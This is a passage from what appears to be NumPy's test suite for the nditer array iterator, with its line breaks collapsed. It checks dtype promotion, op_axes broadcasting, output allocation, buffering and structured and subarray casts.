'buffered'], ['readwrite'], casting='unsafe', op_dtypes='O') ob = i[0][()] rc = sys.getrefcount(ob) for x in i: x[...] += 1 assert_equal(sys.getrefcount(ob), rc-1) assert_equal(a, np.arange(6)+98172489) def test_iter_common_dtype(): # Check that the iterator finds a common data type correctly i = nditer([array([3], dtype='f4'), array([0], dtype='f8')], ['common_dtype'], [['readonly', 'copy']]*2, casting='safe') assert_equal(i.dtypes[0], np.dtype('f8')) assert_equal(i.dtypes[1], np.dtype('f8')) i = nditer([array([3], dtype='i4'), array([0], dtype='f4')], ['common_dtype'], [['readonly', 'copy']]*2, casting='safe') assert_equal(i.dtypes[0], np.dtype('f8')) assert_equal(i.dtypes[1], np.dtype('f8')) i = nditer([array([3], dtype='f4'), array(0, dtype='f8')], ['common_dtype'], [['readonly', 'copy']]*2, casting='same_kind') assert_equal(i.dtypes[0], np.dtype('f4')) assert_equal(i.dtypes[1], np.dtype('f4')) i = nditer([array([3], dtype='u4'), array(0, dtype='i4')], ['common_dtype'], [['readonly', 'copy']]*2, casting='safe') assert_equal(i.dtypes[0], np.dtype('u4')) assert_equal(i.dtypes[1], np.dtype('u4')) i = nditer([array([3], dtype='u4'), array(-12, dtype='i4')], ['common_dtype'], [['readonly', 'copy']]*2, casting='safe') assert_equal(i.dtypes[0], np.dtype('i8')) assert_equal(i.dtypes[1], np.dtype('i8')) i = nditer([array([3], dtype='u4'), array(-12, dtype='i4'), array([2j], dtype='c8'), array([9], dtype='f8')], ['common_dtype'], [['readonly', 'copy']]*4, casting='safe') assert_equal(i.dtypes[0], np.dtype('c16')) assert_equal(i.dtypes[1], np.dtype('c16')) assert_equal(i.dtypes[2], np.dtype('c16')) assert_equal(i.dtypes[3], np.dtype('c16')) assert_equal(i.value, (3, -12, 2j, 9)) # When allocating outputs, other outputs aren't factored in i = nditer([array([3], dtype='i4'), None, array([2j], dtype='c16')], [], [['readonly', 'copy'], ['writeonly', 'allocate'], ['writeonly']], casting='safe') assert_equal(i.dtypes[0], np.dtype('i4')) assert_equal(i.dtypes[1], np.dtype('i4')) assert_equal(i.dtypes[2], np.dtype('c16')) # But, if common data types are requested, they are i = nditer([array([3], dtype='i4'), None, array([2j], dtype='c16')], ['common_dtype'], [['readonly', 'copy'], ['writeonly', 'allocate'], ['writeonly']], casting='safe') assert_equal(i.dtypes[0], np.dtype('c16')) assert_equal(i.dtypes[1], np.dtype('c16')) assert_equal(i.dtypes[2], np.dtype('c16')) def test_iter_op_axes(): # Check that custom axes work # Reverse the axes a = arange(6).reshape(2, 3) i = nditer([a, a.T], [], [['readonly']]*2, op_axes=[[0, 1], [1, 0]]) assert_(all([x == y for (x, y) in i])) a = arange(24).reshape(2, 3, 4) i = nditer([a.T, a], [], [['readonly']]*2, op_axes=[[2, 1, 0], None]) assert_(all([x == y for (x, y) in i])) # Broadcast 1D to any dimension a = arange(1, 31).reshape(2, 3, 5) b = arange(1, 3) i = nditer([a, b], [], [['readonly']]*2, op_axes=[None, [0, -1, -1]]) assert_equal([x*y for (x, y) in i], (a*b.reshape(2, 1, 1)).ravel()) b = arange(1, 4) i = nditer([a, b], [], [['readonly']]*2, op_axes=[None, [-1, 0, -1]]) assert_equal([x*y for (x, y) in i], (a*b.reshape(1, 3, 1)).ravel()) b = arange(1, 6) i = nditer([a, b], [], [['readonly']]*2, op_axes=[None, [np.newaxis, np.newaxis, 0]]) assert_equal([x*y for (x, y) in i], (a*b.reshape(1, 1, 5)).ravel()) # Inner product-style broadcasting a = arange(24).reshape(2, 3, 4) b = arange(40).reshape(5, 2, 4) i = nditer([a, b], ['multi_index'], [['readonly']]*2, op_axes=[[0, 1, -1, -1], [-1, -1, 0, 1]]) assert_equal(i.shape, (2, 3, 5, 2)) # Matrix product-style broadcasting a = arange(12).reshape(3, 4) b = arange(20).reshape(4, 5) i = nditer([a, b], ['multi_index'], [['readonly']]*2, op_axes=[[0, -1], [-1, 1]]) assert_equal(i.shape, (3, 5)) def test_iter_op_axes_errors(): # Check that custom axes throws errors for bad inputs # Wrong number of items in op_axes a = arange(6).reshape(2, 3) assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2, op_axes=[[0], [1], [0]]) # Out of bounds items in op_axes assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2, op_axes=[[2, 1], [0, 1]]) assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2, op_axes=[[0, 1], [2, -1]]) # Duplicate items in op_axes assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2, op_axes=[[0, 0], [0, 1]]) assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2, op_axes=[[0, 1], [1, 1]]) # Different sized arrays in op_axes assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2, op_axes=[[0, 1], [0, 1, 0]]) # Non-broadcastable dimensions in the result assert_raises(ValueError, nditer, [a, a], [], [['readonly']]*2, op_axes=[[0, 1], [1, 0]]) def test_iter_copy(): # Check that copying the iterator works correctly a = arange(24).reshape(2, 3, 4) # Simple iterator i = nditer(a) j = i.copy() assert_equal([x[()] for x in i], [x[()] for x in j]) i.iterindex = 3 j = i.copy() assert_equal([x[()] for x in i], [x[()] for x in j]) # Buffered iterator i = nditer(a, ['buffered', 'ranged'], order='F', buffersize=3) j = i.copy() assert_equal([x[()] for x in i], [x[()] for x in j]) i.iterindex = 3 j = i.copy() assert_equal([x[()] for x in i], [x[()] for x in j]) i.iterrange = (3, 9) j = i.copy() assert_equal([x[()] for x in i], [x[()] for x in j]) i.iterrange = (2, 18) next(i) next(i) j = i.copy() assert_equal([x[()] for x in i], [x[()] for x in j]) # Casting iterator i = nditer(a, ['buffered'], order='F', casting='unsafe', op_dtypes='f8', buffersize=5) j = i.copy() i = None assert_equal([x[()] for x in j], a.ravel(order='F')) a = arange(24, dtype='<i4').reshape(2, 3, 4) i = nditer(a, ['buffered'], order='F', casting='unsafe', op_dtypes='>f8', buffersize=5) j = i.copy() i = None assert_equal([x[()] for x in j], a.ravel(order='F')) def test_iter_allocate_output_simple(): # Check that the iterator will properly allocate outputs # Simple case a = arange(6) i = nditer([a, None], [], [['readonly'], ['writeonly', 'allocate']], op_dtypes=[None, np.dtype('f4')]) assert_equal(i.operands[1].shape, a.shape) assert_equal(i.operands[1].dtype, np.dtype('f4')) def test_iter_allocate_output_buffered_readwrite(): # Allocated output with buffering + delay_bufalloc a = arange(6) i = nditer([a, None], ['buffered', 'delay_bufalloc'], [['readonly'], ['allocate', 'readwrite']]) i.operands[1][:] = 1 i.reset() for x in i: x[1][...] += x[0][...] assert_equal(i.operands[1], a+1) def test_iter_allocate_output_itorder(): # The allocated output should match the iteration order # C-order input, best iteration order a = arange(6, dtype='i4').reshape(2, 3) i = nditer([a, None], [], [['readonly'], ['writeonly', 'allocate']], op_dtypes=[None, np.dtype('f4')]) assert_equal(i.operands[1].shape, a.shape) assert_equal(i.operands[1].strides, a.strides) assert_equal(i.operands[1].dtype, np.dtype('f4')) # F-order input, best iteration order a = arange(24, dtype='i4').reshape(2, 3, 4).T i = nditer([a, None], [], [['readonly'], ['writeonly', 'allocate']], op_dtypes=[None, np.dtype('f4')]) assert_equal(i.operands[1].shape, a.shape) assert_equal(i.operands[1].strides, a.strides) assert_equal(i.operands[1].dtype, np.dtype('f4')) # Non-contiguous input, C iteration order a = arange(24, dtype='i4').reshape(2, 3, 4).swapaxes(0, 1) i = nditer([a, None], [], [['readonly'], ['writeonly', 'allocate']], order='C', op_dtypes=[None, np.dtype('f4')]) assert_equal(i.operands[1].shape, a.shape) assert_equal(i.operands[1].strides, (32, 16, 4)) assert_equal(i.operands[1].dtype, np.dtype('f4')) def test_iter_allocate_output_opaxes(): # Specifing op_axes should work a = arange(24, dtype='i4').reshape(2, 3, 4) i = nditer([None, a], [], [['writeonly', 'allocate'], ['readonly']], op_dtypes=[np.dtype('u4'), None], op_axes=[[1, 2, 0], None]) assert_equal(i.operands[0].shape, (4, 2, 3)) assert_equal(i.operands[0].strides, (4, 48, 16)) assert_equal(i.operands[0].dtype, np.dtype('u4')) def test_iter_allocate_output_types_promotion(): # Check type promotion of automatic outputs i = nditer([array([3], dtype='f4'), array([0], dtype='f8'), None], [], [['readonly']]*2+[['writeonly', 'allocate']]) assert_equal(i.dtypes[2], np.dtype('f8')) i = nditer([array([3], dtype='i4'), array([0], dtype='f4'), None], [], [['readonly']]*2+[['writeonly', 'allocate']]) assert_equal(i.dtypes[2], np.dtype('f8')) i = nditer([array([3], dtype='f4'), array(0, dtype='f8'), None], [], [['readonly']]*2+[['writeonly', 'allocate']]) assert_equal(i.dtypes[2], np.dtype('f4')) i = nditer([array([3], dtype='u4'), array(0, dtype='i4'), None], [], [['readonly']]*2+[['writeonly', 'allocate']]) assert_equal(i.dtypes[2], np.dtype('u4')) i = nditer([array([3], dtype='u4'), array(-12, dtype='i4'), None], [], [['readonly']]*2+[['writeonly', 'allocate']]) assert_equal(i.dtypes[2], np.dtype('i8')) def test_iter_allocate_output_types_byte_order(): # Verify the rules for byte order changes # When there's just one input, the output type exactly matches a = array([3], dtype='u4').newbyteorder() i = nditer([a, None], [], [['readonly'], ['writeonly', 'allocate']]) assert_equal(i.dtypes[0], i.dtypes[1]) # With two or more inputs, the output type is in native byte order i = nditer([a, a, None], [], [['readonly'], ['readonly'], ['writeonly', 'allocate']]) assert_(i.dtypes[0] != i.dtypes[2]) assert_equal(i.dtypes[0].newbyteorder('='), i.dtypes[2]) def test_iter_allocate_output_types_scalar(): # If the inputs are all scalars, the output should be a scalar i = nditer([None, 1, 2.3, np.float32(12), np.complex128(3)], [], [['writeonly', 'allocate']] + [['readonly']]*4) assert_equal(i.operands[0].dtype, np.dtype('complex128')) assert_equal(i.operands[0].ndim, 0) def test_iter_allocate_output_subtype(): # Make sure that the subtype with priority wins # matrix vs ndarray a = np.matrix([[1, 2], [3, 4]]) b = np.arange(4).reshape(2, 2).T i = nditer([a, b, None], [], [['readonly'], ['readonly'], ['writeonly', 'allocate']]) assert_equal(type(a), type(i.operands[2])) assert_(type(b) != type(i.operands[2])) assert_equal(i.operands[2].shape, (2, 2)) # matrix always wants things to be 2D b = np.arange(4).reshape(1, 2, 2) assert_raises(RuntimeError, nditer, [a, b, None], [], [['readonly'], ['readonly'], ['writeonly', 'allocate']]) # but if subtypes are disabled, the result can still work i = nditer([a, b, None], [], [['readonly'], ['readonly'], ['writeonly', 'allocate', 'no_subtype']]) assert_equal(type(b), type(i.operands[2])) assert_(type(a) != type(i.operands[2])) assert_equal(i.operands[2].shape, (1, 2, 2)) def test_iter_allocate_output_errors(): # Check that the iterator will throw errors for bad output allocations # Need an input if no output data type is specified a = arange(6) assert_raises(TypeError, nditer, [a, None], [], [['writeonly'], ['writeonly', 'allocate']]) # Allocated output should be flagged for writing assert_raises(ValueError, nditer, [a, None], [], [['readonly'], ['allocate', 'readonly']]) # Allocated output can't have buffering without delayed bufalloc assert_raises(ValueError, nditer, [a, None], ['buffered'], ['allocate', 'readwrite']) # Must specify at least one input assert_raises(ValueError, nditer, [None, None], [], [['writeonly', 'allocate'], ['writeonly', 'allocate']], op_dtypes=[np.dtype('f4'), np.dtype('f4')]) # If using op_axes, must specify all the axes a = arange(24, dtype='i4').reshape(2, 3, 4) assert_raises(ValueError, nditer, [a, None], [], [['readonly'], ['writeonly', 'allocate']], op_dtypes=[None, np.dtype('f4')], op_axes=[None, [0, np.newaxis, 1]]) # If using op_axes, the axes must be within bounds assert_raises(ValueError, nditer, [a, None], [], [['readonly'], ['writeonly', 'allocate']], op_dtypes=[None, np.dtype('f4')], op_axes=[None, [0, 3, 1]]) # If using op_axes, there can't be duplicates assert_raises(ValueError, nditer, [a, None], [], [['readonly'], ['writeonly', 'allocate']], op_dtypes=[None, np.dtype('f4')], op_axes=[None, [0, 2, 1, 0]]) def test_iter_remove_axis(): a = arange(24).reshape(2, 3, 4) i = nditer(a, ['multi_index']) i.remove_axis(1) assert_equal([x for x in i], a[:, 0,:].ravel()) a = a[::-1,:,:] i = nditer(a, ['multi_index']) i.remove_axis(0) assert_equal([x for x in i], a[0,:,:].ravel()) def test_iter_remove_multi_index_inner_loop(): # Check that removing multi-index support works a = arange(24).reshape(2, 3, 4) i = nditer(a, ['multi_index']) assert_equal(i.ndim, 3) assert_equal(i.shape, (2, 3, 4)) assert_equal(i.itviews[0].shape, (2, 3, 4)) # Removing the multi-index tracking causes all dimensions to coalesce before = [x for x in i] i.remove_multi_index() after = [x for x in i] assert_equal(before, after) assert_equal(i.ndim, 1) assert_raises(ValueError, lambda i:i.shape, i) assert_equal(i.itviews[0].shape, (24,)) # Removing the inner loop means there's just one iteration i.reset() assert_equal(i.itersize, 24) assert_equal(i[0].shape, tuple()) i.enable_external_loop() assert_equal(i.itersize, 24) assert_equal(i[0].shape, (24,)) assert_equal(i.value, arange(24)) def test_iter_iterindex(): # Make sure iterindex works buffersize = 5 a = arange(24).reshape(4, 3, 2) for flags in ([], ['buffered']): i = nditer(a, flags, buffersize=buffersize) assert_equal(iter_iterindices(i), list(range(24))) i.iterindex = 2 assert_equal(iter_iterindices(i), list(range(2, 24))) i = nditer(a, flags, order='F', buffersize=buffersize) assert_equal(iter_iterindices(i), list(range(24))) i.iterindex = 5 assert_equal(iter_iterindices(i), list(range(5, 24))) i = nditer(a[::-1], flags, order='F', buffersize=buffersize) assert_equal(iter_iterindices(i), list(range(24))) i.iterindex = 9 assert_equal(iter_iterindices(i), list(range(9, 24))) i = nditer(a[::-1, ::-1], flags, order='C', buffersize=buffersize) assert_equal(iter_iterindices(i), list(range(24))) i.iterindex = 13 assert_equal(iter_iterindices(i), list(range(13, 24))) i = nditer(a[::1, ::-1], flags, buffersize=buffersize) assert_equal(iter_iterindices(i), list(range(24))) i.iterindex = 23 assert_equal(iter_iterindices(i), list(range(23, 24))) i.reset() i.iterindex = 2 assert_equal(iter_iterindices(i), list(range(2, 24))) def test_iter_iterrange(): # Make sure getting and resetting the iterrange works buffersize = 5 a = arange(24, dtype='i4').reshape(4, 3, 2) a_fort = a.ravel(order='F') i = nditer(a, ['ranged'], ['readonly'], order='F', buffersize=buffersize) assert_equal(i.iterrange, (0, 24)) assert_equal([x[()] for x in i], a_fort) for r in [(0, 24), (1, 2), (3, 24), (5, 5), (0, 20), (23, 24)]: i.iterrange = r assert_equal(i.iterrange, r) assert_equal([x[()] for x in i], a_fort[r[0]:r[1]]) i = nditer(a, ['ranged', 'buffered'], ['readonly'], order='F', op_dtypes='f8', buffersize=buffersize) assert_equal(i.iterrange, (0, 24)) assert_equal([x[()] for x in i], a_fort) for r in [(0, 24), (1, 2), (3, 24), (5, 5), (0, 20), (23, 24)]: i.iterrange = r assert_equal(i.iterrange, r) assert_equal([x[()] for x in i], a_fort[r[0]:r[1]]) def get_array(i): val = np.array([], dtype='f8') for x in i: val = np.concatenate((val, x)) return val i = nditer(a, ['ranged', 'buffered', 'external_loop'], ['readonly'], order='F', op_dtypes='f8', buffersize=buffersize) assert_equal(i.iterrange, (0, 24)) assert_equal(get_array(i), a_fort) for r in [(0, 24), (1, 2), (3, 24), (5, 5), (0, 20), (23, 24)]: i.iterrange = r assert_equal(i.iterrange, r) assert_equal(get_array(i), a_fort[r[0]:r[1]]) def test_iter_buffering(): # Test buffering with several buffer sizes and types arrays = [] # F-order swapped array arrays.append(np.arange(24, dtype='c16').reshape(2, 3, 4).T.newbyteorder().byteswap()) # Contiguous 1-dimensional array arrays.append(np.arange(10, dtype='f4')) # Unaligned array a = np.zeros((4*16+1,), dtype='i1')[1:] a.dtype = 'i4' a[:] = np.arange(16, dtype='i4') arrays.append(a) # 4-D F-order array arrays.append(np.arange(120, dtype='i4').reshape(5, 3, 2, 4).T) for a in arrays: for buffersize in (1, 2, 3, 5, 8, 11, 16, 1024): vals = [] i = nditer(a, ['buffered', 'external_loop'], [['readonly', 'nbo', 'aligned']], order='C', casting='equiv', buffersize=buffersize) while not i.finished: assert_(i[0].size <= buffersize) vals.append(i[0].copy()) i.iternext() assert_equal(np.concatenate(vals), a.ravel(order='C')) def test_iter_write_buffering(): # Test that buffering of writes is working # F-order swapped array a = np.arange(24).reshape(2, 3, 4).T.newbyteorder().byteswap() i = nditer(a, ['buffered'], [['readwrite', 'nbo', 'aligned']], casting='equiv', order='C', buffersize=16) x = 0 while not i.finished: i[0] = x x += 1 i.iternext() assert_equal(a.ravel(order='C'), np.arange(24)) def test_iter_buffering_delayed_alloc(): # Test that delaying buffer allocation works a = np.arange(6) b = np.arange(1, dtype='f4') i = nditer([a, b], ['buffered', 'delay_bufalloc', 'multi_index', 'reduce_ok'], ['readwrite'], casting='unsafe', op_dtypes='f4') assert_(i.has_delayed_bufalloc) assert_raises(ValueError, lambda i:i.multi_index, i) assert_raises(ValueError, lambda i:i[0], i) assert_raises(ValueError, lambda i:i[0:2], i) def assign_iter(i): i[0] = 0 assert_raises(ValueError, assign_iter, i) i.reset() assert_(not i.has_delayed_bufalloc) assert_equal(i.multi_index, (0,)) assert_equal(i[0], 0) i[1] = 1 assert_equal(i[0:2], [0, 1]) assert_equal([[x[0][()], x[1][()]] for x in i], list(zip(range(6), [1]*6))) def test_iter_buffered_cast_simple(): # Test that buffering can handle a simple cast a = np.arange(10, dtype='f4') i = nditer(a, ['buffered', 'external_loop'], [['readwrite', 'nbo', 'aligned']], casting='same_kind', op_dtypes=[np.dtype('f8')], buffersize=3) for v in i: v[...] *= 2 assert_equal(a, 2*np.arange(10, dtype='f4')) def test_iter_buffered_cast_byteswapped(): # Test that buffering can handle a cast which requires swap->cast->swap a = np.arange(10, dtype='f4').newbyteorder().byteswap() i = nditer(a, ['buffered', 'external_loop'], [['readwrite', 'nbo', 'aligned']], casting='same_kind', op_dtypes=[np.dtype('f8').newbyteorder()], buffersize=3) for v in i: v[...] *= 2 assert_equal(a, 2*np.arange(10, dtype='f4')) try: warnings.simplefilter("ignore", np.ComplexWarning) a = np.arange(10, dtype='f8').newbyteorder().byteswap() i = nditer(a, ['buffered', 'external_loop'], [['readwrite', 'nbo', 'aligned']], casting='unsafe', op_dtypes=[np.dtype('c8').newbyteorder()], buffersize=3) for v in i: v[...] *= 2 assert_equal(a, 2*np.arange(10, dtype='f8')) finally: warnings.simplefilter("default", np.ComplexWarning) def test_iter_buffered_cast_byteswapped_complex(): # Test that buffering can handle a cast which requires swap->cast->copy a = np.arange(10, dtype='c8').newbyteorder().byteswap() a += 2j i = nditer(a, ['buffered', 'external_loop'], [['readwrite', 'nbo', 'aligned']], casting='same_kind', op_dtypes=[np.dtype('c16')], buffersize=3) for v in i: v[...] *= 2 assert_equal(a, 2*np.arange(10, dtype='c8') + 4j) a = np.arange(10, dtype='c8') a += 2j i = nditer(a, ['buffered', 'external_loop'], [['readwrite', 'nbo', 'aligned']], casting='same_kind', op_dtypes=[np.dtype('c16').newbyteorder()], buffersize=3) for v in i: v[...] *= 2 assert_equal(a, 2*np.arange(10, dtype='c8') + 4j) a = np.arange(10, dtype=np.clongdouble).newbyteorder().byteswap() a += 2j i = nditer(a, ['buffered', 'external_loop'], [['readwrite', 'nbo', 'aligned']], casting='same_kind', op_dtypes=[np.dtype('c16')], buffersize=3) for v in i: v[...] *= 2 assert_equal(a, 2*np.arange(10, dtype=np.clongdouble) + 4j) a = np.arange(10, dtype=np.longdouble).newbyteorder().byteswap() i = nditer(a, ['buffered', 'external_loop'], [['readwrite', 'nbo', 'aligned']], casting='same_kind', op_dtypes=[np.dtype('f4')], buffersize=7) for v in i: v[...] *= 2 assert_equal(a, 2*np.arange(10, dtype=np.longdouble)) def test_iter_buffered_cast_structured_type(): # Tests buffering of structured types # simple -> struct type (duplicates the value) sdt = [('a', 'f4'), ('b', 'i8'), ('c', 'c8', (2, 3)), ('d', 'O')] a = np.arange(3, dtype='f4') + 0.5 i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt) vals = [np.array(x) for x in i] assert_equal(vals[0]['a'], 0.5) assert_equal(vals[0]['b'], 0) assert_equal(vals[0]['c'], [[(0.5)]*3]*2) assert_equal(vals[0]['d'], 0.5) assert_equal(vals[1]['a'], 1.5) assert_equal(vals[1]['b'], 1) assert_equal(vals[1]['c'], [[(1.5)]*3]*2) assert_equal(vals[1]['d'], 1.5) assert_equal(vals[0].dtype, np.dtype(sdt)) # object -> struct type sdt = [('a', 'f4'), ('b', 'i8'), ('c', 'c8', (2, 3)), ('d', 'O')] a = np.zeros((3,), dtype='O') a[0] = (0.5, 0.5, [[0.5, 0.5, 0.5], [0.5, 0.5, 0.5]], 0.5) a[1] = (1.5, 1.5, [[1.5, 1.5, 1.5], [1.5, 1.5, 1.5]], 1.5) a[2] = (2.5, 2.5, [[2.5, 2.5, 2.5], [2.5, 2.5, 2.5]], 2.5) rc = sys.getrefcount(a[0]) i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt) vals = [x.copy() for x in i] assert_equal(vals[0]['a'], 0.5) assert_equal(vals[0]['b'], 0) assert_equal(vals[0]['c'], [[(0.5)]*3]*2) assert_equal(vals[0]['d'], 0.5) assert_equal(vals[1]['a'], 1.5) assert_equal(vals[1]['b'], 1) assert_equal(vals[1]['c'], [[(1.5)]*3]*2) assert_equal(vals[1]['d'], 1.5) assert_equal(vals[0].dtype, np.dtype(sdt)) vals, i, x = [None]*3 assert_equal(sys.getrefcount(a[0]), rc) # struct type -> simple (takes the first value) sdt = [('a', 'f4'), ('b', 'i8'), ('d', 'O')] a = np.array([(5.5, 7, 'test'), (8, 10, 11)], dtype=sdt) i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes='i4') assert_equal([x_[()] for x_ in i], [5, 8]) # struct type -> struct type (field-wise copy) sdt1 = [('a', 'f4'), ('b', 'i8'), ('d', 'O')] sdt2 = [('d', 'u2'), ('a', 'O'), ('b', 'f8')] a = np.array([(1, 2, 3), (4, 5, 6)], dtype=sdt1) i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) assert_equal([np.array(x_) for x_ in i], [np.array((3, 1, 2), dtype=sdt2), np.array((6, 4, 5), dtype=sdt2)]) # struct type -> struct type (field gets discarded) sdt1 = [('a', 'f4'), ('b', 'i8'), ('d', 'O')] sdt2 = [('b', 'O'), ('a', 'f8')] a = np.array([(1, 2, 3), (4, 5, 6)], dtype=sdt1) i = nditer(a, ['buffered', 'refs_ok'], ['readwrite'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) vals = [] for x in i: vals.append(np.array(x)) x['a'] = x['b']+3 assert_equal(vals, [np.array((2, 1), dtype=sdt2), np.array((5, 4), dtype=sdt2)]) assert_equal(a, np.array([(5, 2, None), (8, 5, None)], dtype=sdt1)) # struct type -> struct type (structured field gets discarded) sdt1 = [('a', 'f4'), ('b', 'i8'), ('d', [('a', 'i2'), ('b', 'i4')])] sdt2 = [('b', 'O'), ('a', 'f8')] a = np.array([(1, 2, (0, 9)), (4, 5, (20, 21))], dtype=sdt1) i = nditer(a, ['buffered', 'refs_ok'], ['readwrite'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) vals = [] for x in i: vals.append(np.array(x)) x['a'] = x['b']+3 assert_equal(vals, [np.array((2, 1), dtype=sdt2), np.array((5, 4), dtype=sdt2)]) assert_equal(a, np.array([(5, 2, (0, 0)), (8, 5, (0, 0))], dtype=sdt1)) # struct type -> struct type (structured field w/ ref gets discarded) sdt1 = [('a', 'f4'), ('b', 'i8'), ('d', [('a', 'i2'), ('b', 'O')])] sdt2 = [('b', 'O'), ('a', 'f8')] a = np.array([(1, 2, (0, 9)), (4, 5, (20, 21))], dtype=sdt1) i = nditer(a, ['buffered', 'refs_ok'], ['readwrite'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) vals = [] for x in i: vals.append(np.array(x)) x['a'] = x['b']+3 assert_equal(vals, [np.array((2, 1), dtype=sdt2), np.array((5, 4), dtype=sdt2)]) assert_equal(a, np.array([(5, 2, (0, None)), (8, 5, (0, None))], dtype=sdt1)) # struct type -> struct type back (structured field w/ ref gets discarded) sdt1 = [('b', 'O'), ('a', 'f8')] sdt2 = [('a', 'f4'), ('b', 'i8'), ('d', [('a', 'i2'), ('b', 'O')])] a = np.array([(1, 2), (4, 5)], dtype=sdt1) i = nditer(a, ['buffered', 'refs_ok'], ['readwrite'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) vals = [] for x in i: vals.append(np.array(x)) assert_equal(x['d'], np.array((0, None), dtype=[('a', 'i2'), ('b', 'O')])) x['a'] = x['b']+3 assert_equal(vals, [np.array((2, 1, (0, None)), dtype=sdt2), np.array((5, 4, (0, None)), dtype=sdt2)]) assert_equal(a, np.array([(1, 4), (4, 7)], dtype=sdt1)) def test_iter_buffered_cast_subarray(): # Tests buffering of subarrays # one element -> many (copies it to all) sdt1 = [('a', 'f4')] sdt2 = [('a', 'f8', (3, 2, 2))] a = np.zeros((6,), dtype=sdt1) a['a'] = np.arange(6) i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) for x, count in zip(i, list(range(6))): assert_(np.all(x['a'] == count)) # one element -> many -> back (copies it to all) sdt1 = [('a', 'O', (1, 1))] sdt2 = [('a', 'O', (3, 2, 2))] a = np.zeros((6,), dtype=sdt1) a['a'][:, 0, 0] = np.arange(6) i = nditer(a, ['buffered', 'refs_ok'], ['readwrite'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) count = 0 for x in i: assert_(np.all(x['a'] == count)) x['a'][0] += 2 count += 1 assert_equal(a['a'], np.arange(6).reshape(6, 1, 1)+2) # many -> one element -> back (copies just element 0) sdt1 = [('a', 'O', (3, 2, 2))] sdt2 = [('a', 'O', (1,))] a = np.zeros((6,), dtype=sdt1) a['a'][:, 0, 0, 0] = np.arange(6) i = nditer(a, ['buffered', 'refs_ok'], ['readwrite'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) count = 0 for x in i: assert_equal(x['a'], count) x['a'] += 2 count += 1 assert_equal(a['a'], np.arange(6).reshape(6, 1, 1, 1)*np.ones((1, 3, 2, 2))+2) # many -> one element -> back (copies just element 0) sdt1 = [('a', 'f8', (3, 2, 2))] sdt2 = [('a', 'O', (1,))] a = np.zeros((6,), dtype=sdt1) a['a'][:, 0, 0, 0] = np.arange(6) i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) count = 0 for x in i: assert_equal(x['a'], count) count += 1 # many -> one element (copies just element 0) sdt1 = [('a', 'O', (3, 2, 2))] sdt2 = [('a', 'f4', (1,))] a = np.zeros((6,), dtype=sdt1) a['a'][:, 0, 0, 0] = np.arange(6) i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) count = 0 for x in i: assert_equal(x['a'], count) count += 1 # many -> matching shape (straightforward copy) sdt1 = [('a', 'O', (3, 2, 2))] sdt2 = [('a', 'f4', (3, 2, 2))] a = np.zeros((6,), dtype=sdt1) a['a'] = np.arange(6*3*2*2).reshape(6, 3, 2, 2) i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) count = 0 for x in i: assert_equal(x['a'], a[count]['a']) count += 1 # vector -> smaller vector (truncates) sdt1 = [('a', 'f8', (6,))] sdt2 = [('a', 'f4', (2,))] a = np.zeros((6,), dtype=sdt1) a['a'] = np.arange(6*6).reshape(6, 6) i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) count = 0 for x in i: assert_equal(x['a'], a[count]['a'][:2]) count += 1 # vector -> bigger vector (pads with zeros) sdt1 = [('a', 'f8', (2,))] sdt2 = [('a', 'f4', (6,))] a = np.zeros((6,), dtype=sdt1) a['a'] = np.arange(6*2).reshape(6, 2) i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) count = 0 for x in i: assert_equal(x['a'][:2], a[count]['a']) assert_equal(x['a'][2:], [0, 0, 0, 0]) count += 1 # vector -> matrix (broadcasts) sdt1 = [('a', 'f8', (2,))] sdt2 = [('a', 'f4', (2, 2))] a = np.zeros((6,), dtype=sdt1) a['a'] = np.arange(6*2).reshape(6, 2) i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) count = 0 for x in i: assert_equal(x['a'][0], a[count]['a']) assert_equal(x['a'][1], a[count]['a']) count += 1 # vector -> matrix (broadcasts and zero-pads) sdt1 = [('a', 'f8', (2, 1))] sdt2 = [('a', 'f4', (3, 2))] a = np.zeros((6,), dtype=sdt1) a['a'] = np.arange(6*2).reshape(6, 2, 1) i = nditer(a, ['buffered', 'refs_ok'], ['readonly'], casting='unsafe', op_dtypes=sdt2) assert_equal(i[0].dtype, np.dtype(sdt2)) count = 0 for x in i: assert_equal(x['a'][:2, 0], a[count]['a'][:, 0]) assert_equal(x['a'][:2, 1], a[count]['a'][:, 0]) assert_equal(x['a'][2,:], [0, 0]) count += 1 # matrix -> matrix (truncates and zero-pads) sdt1 = [('a', 'f8', (2, 3))] sdt2 = 